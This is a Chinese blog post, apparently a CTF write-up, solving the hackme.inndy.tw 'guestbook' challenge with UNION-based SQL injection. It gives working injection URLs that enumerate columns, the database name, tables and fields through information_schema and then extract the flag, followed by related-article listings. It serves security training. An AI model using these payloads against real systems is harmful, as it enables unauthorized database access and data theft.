CTF中SQL注入范例

最新推荐文章于 2024-07-29 16:48:51 发布
最新推荐文章于 2024-07-29 16:48:51 发布
阅读量280 收藏
点赞数
分类专栏: Web
原文链接:https://blog.csdn.net/weixin_43511698/article/details/102631907
版权

guestbook

题目提示:This guestbook sucks. sqlmap is your friend. 是sql注入
点击Message List 时是空的, 点击post是可以提交新信息,点击查看新信息
在这里插入图片描述
在id值后加上" ’ "测试是否存在测试点网页报错说明存在注入点
union 注入
查看列

https://hackme.inndy.tw/gb/?mod=read&id=-1%20union%20select%201,2,3,4%20#
//id=-1 是让前面的内容不显示

   
   

   
   
  • 1
  • 2

3被回显

1.查看数据库名

https://hackme.inndy.tw/gb/?mod=read&id=-1%20union%20select%201,2,database(),4%20#

   
   

   
   
  • 1

在这里插入图片描述
数据库的名字g8
2.查看表名

https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 0,1),4#

   
   

   
   
  • 1

发现有一个表 flag
3.测试表的字段

https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 1,1),4#

   
   

   
   
  • 1

仍然显示flag
4.读取flag

https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select flag from flag limit 1,1),4#

   
   

   
   
  • 1

得到flag
在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/weixin_43511698/article/details/102631907
SYQ608
关注
专栏目录
CTFSQL注入常见题型整理.pdf
02-11
### CTFSQL注入常见题型整理 #### 前言 在网络安全竞赛(CTFSQL注入是常见的攻击手法之一。通过对网站输入的数据进行构造,攻击者可以利用SQL注入漏洞获取敏感数据,甚至控制整个数据库。本文将详细介绍...
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 5218
以pikachu靶场练习来学习ctf知识
CTF入门笔记之SQL注入
qq_37410729的博客
11-01 3069
sql注入
SQL字符型注入
最新发布
qq_69100706的博客
07-29 394
CTF(Capture The Flag)竞赛,SQL字符型注入是另一种常见的Web安全挑战,通常出现在处理字符串输入的Web应用。字符型SQL注入利用的是应用程序对用户输入的不当过滤或缺乏适当的参数化查询,允许攻击者插入恶意SQL代码以操纵数据库
CTF Web SQL注入专项整理(持续更新
m0_73734159的博客
10-19 3273
SQL注入专项整理
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4676
ctfshow 靶场 web入门 sql注入系列
二、sql注入(CTF技巧)
黑日里不灭的light
03-14 779
解释:在一些题目里面常常充满了各种各样的过滤,我们需要结合实际情况去进行注入,下面提供一些Payload以及适用场景。
sql注入攻击流量情况
07-18
sql注入攻击流量情况
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
ctfsql注入下的一些小技巧.doc
10-07
"ctfsql注入下的一些小技巧" CTF 的 SQL 注入技巧是指在 Capture The Flag 比赛使用的 SQL 注入技术,以获取 Flags 或者其他敏感信息。以下是 CTF SQL 注入的一些小技巧: 一、注释符 在 MySQL ,有两...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库有哪些表; 五、查看表有哪些属性;
CTF-SQL注入
weixin_44770698的博客
06-16 5194
CTF-SQL注入题目整理
CTFer成长之路之CTFSQL注入
天行健,君子以自强不息
02-20 1592
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
2024年最新CTF Web SQL注入专项整理(持续更新)_ctf sql注入,一文轻松搞定
2401_84973202的博客
05-11 1595
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
[CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
ZXW_NUDT的博客
11-17 6254
关于SQL注入的思维导图可以点开看一下大图
CTF入门之SQL注入
PolarPeak的博客
12-08 2230
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
CTF-Web SQL注入
weixin_52182264的博客
04-26 4337
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注)
m0_73734159的博客
12-09 1056
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注入是否成功。布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库的相关信息。可知是字符型的布尔注入(盲注)
CTF 总结03:SQL注入
weixin_42789937的博客
02-25 473
CTF 总结03:SQL注入,在此整理一篇答题合集,适合与我一样对与SQL知道那么一点点,但是又不怎么熟悉流程的小白~
ctfsql注入题目解法
05-05
CTFSQL注入是一种常见的攻击类型,通常是通过构造恶意输入来绕过应用程序的安全控制,从而访问或篡改应用程序的数据。 以下是一些SQL注入题目的解法: 1. 基于错误的注入:这种类型的注入通常涉及到将错误的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值